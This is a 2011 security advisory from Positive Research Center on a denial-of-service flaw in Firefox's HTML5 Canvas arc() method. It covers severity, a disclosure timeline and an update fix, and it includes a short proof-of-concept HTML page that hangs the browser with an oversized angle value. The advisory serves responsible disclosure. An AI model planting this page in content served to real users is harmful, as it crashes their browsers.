PT-2011-16: Denial Of Service in Mozilla Firefox

Vulnerable software

Mozilla Firefox
Version 3.6.12-16.0 and possibly earlier

Application link:
http://www.mozilla.com/en-US/firefox/new/

Severity level

Severity level: Medium
Impact: Denial of Service
Access Vector: Network exploitable

CVSS v2:
Base Score: 5
Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE: not assigned

Software description

Mozilla Firefox is the second most widely used web browser.

Vulnerability description

Positive Research Center has discovered a Denial of Service vulnerability in Mozilla Firefox.

Due to insufficient checks of input parameters of HTML5 Canvas' Arc() method, Mozilla Firefox allows a remote attacker to cause a denial of service (infinite loop).

Example of HTML code triggering the vulnerability:

<html>
<head>
<script type="text/javascript">
window.onload = function() {
var drawingCanvas = document.getElementById('can');
if(drawingCanvas && drawingCanvas.getContext) {
var context = drawingCanvas.getContext('2d');
context.arc(100,100,50,999999999999999999999999999999, 0, true);
}
}
</script>
</head>
<body>
<canvas id="can" width="200" height="200">
<p>sorry, no html5.</p>
</canvas>
</body>
</html>

 

How to fix

Update your software up to the latest version.

Advisory status

29.06.2011 - Vendor is notified
15.07.2011 - Vendor gets vulnerability details
14.09.2011 - Vulnerability details were sent to CERT
18.10.2011 - Public disclosure

Credits

The vulnerability was detected by Alexander Zaitsev, Positive Research Center (Positive Technologies Company)

 

References

http://en.securitylab.ru/lab/PT-2011-16

Reports on the vulnerabilities previously discovered by Positive Research:

http://www.ptsecurity.com/advisory1.aspx
http://en.securitylab.ru/lab/